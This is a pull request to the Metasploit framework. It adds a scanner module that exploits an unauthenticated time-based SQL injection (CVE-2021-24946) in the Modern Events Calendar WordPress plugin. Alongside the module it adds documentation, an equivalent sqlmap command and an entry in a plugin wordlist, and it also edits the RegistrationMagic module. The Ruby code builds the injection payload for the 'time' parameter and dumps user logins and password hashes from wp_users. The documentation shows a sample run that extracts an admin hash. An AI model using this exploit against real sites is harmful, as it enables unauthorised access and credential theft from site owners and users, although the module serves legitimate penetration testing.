### PR TITLE
Wordpress Plugin Modern Events Calendar SQLi (CVE-2021-24946)

### DIFF
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@@ -40,6 +40,7 @@ wordpress-mobile-pack
 learnpress
 wp-mobile-edition
 boldgrid-backup
+modern-events-calendar-lite
 gi-media-library
 chopslider
 bulletproof-security
@@ -48,4 +49,5 @@ simple-backup
 subscribe-to-comments
 easy-wp-smtp
 duplicator_download
+custom-registration-form-builder-with-submission-manager
 woocommerce-abandoned-cart

--- a/documentation/modules/auxiliary/scanner/http/wp_modern_events_calendar_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_modern_events_calendar_sqli.md
@@ -1,0 +1,62 @@
+## Vulnerable Application
+
+Modern Events Calendar plugin contains an unauthenticated timebased SQL injection in
+versions before 6.1.5.  The `time` parameter is vulnerable to injection.
+
+The plugin can be downloaded [here](https://downloads.wordpress.org/plugin/modern-events-calendar-lite.6.1.0.zip)
+
+This module slightly replicates sqlmap running as:
+
+```
+sqlmap -u 'http://<IP>/wp-admin/admin-ajax.php?action=mec_load_single_page&time=2' -p "time" --technique T -T wp_users -C user_login,user_pass --dump --dbms mysql
+```
+
+## Verification Steps
+
+1. Install the plugin, use defaults
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/wp_modern_events_calendar_sqli`
+4. Do: `set rhosts [ip]`
+5. Do: `run`
+6. You should get the users and hashes returned.
+
+## Options
+
+### ACTION: List Users
+
+This action lists `COUNT` users and password hashes.
+
+## COUNT
+
+If action `List Users` is selected (default), this is the number of users to enumerate.
+The larger this list, the more time it will take.  Defaults to `1`.
+
+## Scenarios
+
+### Modern Events Calendar 6.1.0 on Wordpress 5.7.5 on Ubuntu 20.04
+
+```
+resource (calendar.rb)> use auxiliary/scanner/http/wp_modern_events_calendar_sqli
+resource (calendar.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (calendar.rb)> set verbose true
+verbose => true
+resource (calendar.rb)> run
+[*] Checking /wp-content/plugins/modern-events-calendar-lite/readme.txt
+[*] Found version 6.1.0 in the plugin
+[+] Vulnerable version of Modern Events Calendar detected
+[*] {SQLi} Executing (select group_concat(FMuxps) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) FMuxps from wp_users limit 1) tXKksULcj)
+[*] {SQLi} Encoded to (select group_concat(FMuxps) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0xde,0)),ifnull(user_pass,repeat(0x79,0))) as binary) FMuxps from wp_users limit 1) tXKksULcj)
+[*] {SQLi} Time-based injection: expecting output of length 40
+admin
+$P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
+[+] wp_users
+========
+
+ user_login  user_pass
+ ----------  ---------
+ admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
+ 
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/scanner/http/wp_modern_events_calendar_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_modern_events_calendar_sqli.rb
@@ -1,0 +1,103 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::SQLi
+  require 'metasploit/framework/hashes/identify'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Modern Events Calendar SQLi Scanner',
+        'Description' => %q{
+          Modern Events Calendar plugin contains an unauthenticated timebased SQL injection in
+          versions before 6.1.5.  The time parameter is vulnerable to injection.
+        },
+        'Author' => [
+          'h00die', # msf module
+          'Hacker5preme (Ron Jost)', # edb
+          'red0xff' # sqli lib assistance
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'EDB', '50687' ],
+          [ 'CVE', '2021-24946' ],
+          [ 'URL', 'https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md' ],
+          [ 'WPVDB', '09871847-1d6a-4dfe-8a8c-f2f53ff87445' ]
+        ],
+        'Actions' => [
+          ['List Users', { 'Description' => 'Queries username, password hash for COUNT users' }],
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        },
+        'DefaultAction' => 'List Users',
+        'DisclosureDate' => '2021-12-13'
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 1])
+    ]
+  end
+
+  def run_host(ip)
+    unless wordpress_and_online?
+      fail_with Failure::NotVulnerable, 'Server not online or not detected as wordpress'
+    end
+
+    checkcode = check_plugin_version_from_readme('modern-events-calendar-lite', '6.1.5')
+    unless [Msf::Exploit::CheckCode::Vulnerable, Msf::Exploit::CheckCode::Appears, Msf::Exploit::CheckCode::Detected].include?(checkcode)
+      fail_with Failure::NotVulnerable, 'Modern Events Calendar version not vulnerable'
+    end
+    print_good('Vulnerable version of Modern Events Calendar detected')
+
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload| # also tried encoder: :base64 and still not quite getting the right answer.
+      d = Rex::Text.rand_text_numeric(4)
+      # the webapp takes this parameter and uses it two times in the query, therefore our sleep is 2x what it should be. so we need to cut it.
+      payload = payload.gsub(/sleep\(\d+\.\d+\)/i, "sleep(#{datastore['SQLIDELAY'] / 2})")
+
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+        'vars_get' => {
+          'action' => 'mec_load_single_page',
+          # taken from sqlmap
+          'time' => "#{Rex::Text.rand_text_numeric(1)}) AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)}) AND (#{d}=#{d}"
+        }
+      })
+      fail_with Failure::Unreachable, 'Connection failed' unless res
+    end
+    unless @sqli.test_vulnerable
+      fail_with Failure::PayloadFailed, "#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay."
+    end
+
+    columns = ['user_login', 'user_pass']
+    results = @sqli.dump_table_fields('wp_users', columns, '', datastore['COUNT'])
+    table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 1, 'Columns' => columns)
+    results.each do |user|
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: user[0],
+        private_type: :nonreplayable_hash,
+        jtr_format: identify_hash(user[1]),
+        private_data: user[1],
+        service_name: 'Wordpress',
+        address: ip,
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      })
+      table << user
+    end
+    print_good(table.to_s)
+  end
+end

--- a/modules/auxiliary/scanner/http/wp_registrationmagic_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_registrationmagic_sqli.rb
@@ -49,19 +49,21 @@ class MetasploitModule < Msf::Auxiliary
     ]
   end
 
-  def run_host(ip)
+  def check_host(_ip)
     unless wordpress_and_online?
-      vprint_error('Server not online or not detected as wordpress')
-      return
+      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
     end
 
     checkcode = check_plugin_version_from_readme('custom-registration-form-builder-with-submission-manager', '5.0.1.6')
     if checkcode == Msf::Exploit::CheckCode::Safe
-      vprint_error('RegistrationMagic version not vulnerable')
-      return
+      return Msf::Exploit::CheckCode::Safe('RegistrationMagic version not vulnerable')
     end
-    print_good('Vulnerable version of RegistrationMagic detected')
 
+    print_good('Vulnerable version of RegistrationMagic detected')
+    checkcode
+  end
+
+  def run_host(ip)
     cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
 
     fail_with(Failure::NoAccess, 'Invalid login, check credentials') if cookie.nil?


### PR DESCRIPTION
Unauthenticated SQLi in wordpress plugin Modern Events Calendar. Super simple, just install the plugin, and you're good.

This requires #16132 

## Verification

- [ ] Start `msfconsole`
- [ ] Install the plugin, use defaults
- [ ] Start msfconsole
- [ ] Do: `use auxiliary/scanner/http/wp_modern_events_calendar_sqli`
- [ ] Do: `set rhosts [ip]`
- [ ] Do: `run`
- [ ] You should get the users and hashes returned.
- [ ] **Document** is good